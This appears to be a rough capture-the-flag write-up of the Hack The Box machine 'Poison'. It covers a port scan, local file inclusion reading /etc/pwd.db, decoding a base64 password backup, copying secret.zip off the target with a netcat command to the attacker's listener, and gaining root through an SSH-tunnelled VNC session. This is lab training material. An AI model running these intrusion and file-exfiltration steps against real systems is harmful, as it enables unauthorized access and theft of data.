This is another one I intend to “rewrite”, but posting here so I can get to work on it later this week.
Run NMAP: root@kali:~# nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.84
This type of nmap scan prints verbose output, runs stealth syn scan, T4 timing (quicker), OS and version detection + full port range scan.
The results of this scan indicate only 1 open ports, and ALL other ports are closed. The open port is:
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
It’s a web server, so let’s visit the webpage.
It leads us to a “temporary website” that someone has created to test local .php scripts.
My initial instinct is to try all of these scripts and see what sticks out…
info.php:
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017
root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
listfiles.php:
Array ( [0] => .[1] => .. [2] => browse.php [3] => index.php [4] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] pwdbackup.txt )
So, this shows some files that aren’t listed on the front page. Especially interesting is pwdbackup.txt.
Phpinfo.php is the build information for PHP Version 5.6.32.
I want to look further at pwdbackup.txt. I enter that into the scriptname field and get the following output:
What could go wrong, indeed!
I ran this through Base64 decoder x 13 times, and received the password Charix!2#4%6&8(0. I’m assuming Charix is the username, and step 5 will confim that.
Entered password, cat user.txt, done.
I also noticed that this web address seems vulnurable to local file inclusion (LFI) vulnurability. Use of file= suggests I can probably try to access files other than just those listed. I know the OS is FreeBSD, and a quick google search turns up that the passwd file in FreeBSD is actually in /etc/pwd.db, not etc/passwd. I try a few variations of ../../etc/pwd.db but it turns out that all I need to access this file is “file=/etc/pwd.db”
There is also a secret.zip file on the desktop that is password protected. I need to transfer it to my attack machine in order to crack it.
On my attack machine:
nc -l -p 1234 > secret.zip to create a file for it to dump into.
On the victim machine:
Nc –w 3 10.10.14.13 1234 < secret.zip
I’m going to attempt to crack the password with fcrackzip.
Secret.zip doesn’t have a crazy password to crack. Just use Charix’s password.
VNC is running on the server
SSH tunnelling to connect:
root@Kali:~# ssh -L 5901:localhost:5901 charix@10.10.10.84
Using the VNC Gui doesn’t work, use (in another terminal):
root@Kali:~# vncviewer 127.0.0.1:5901 -passwd /root/Desktop/htb/poison/secret
5902 would have been Charix’s desktop. Poison:2 suggests that. 5901 would be the other VNC running, which is root.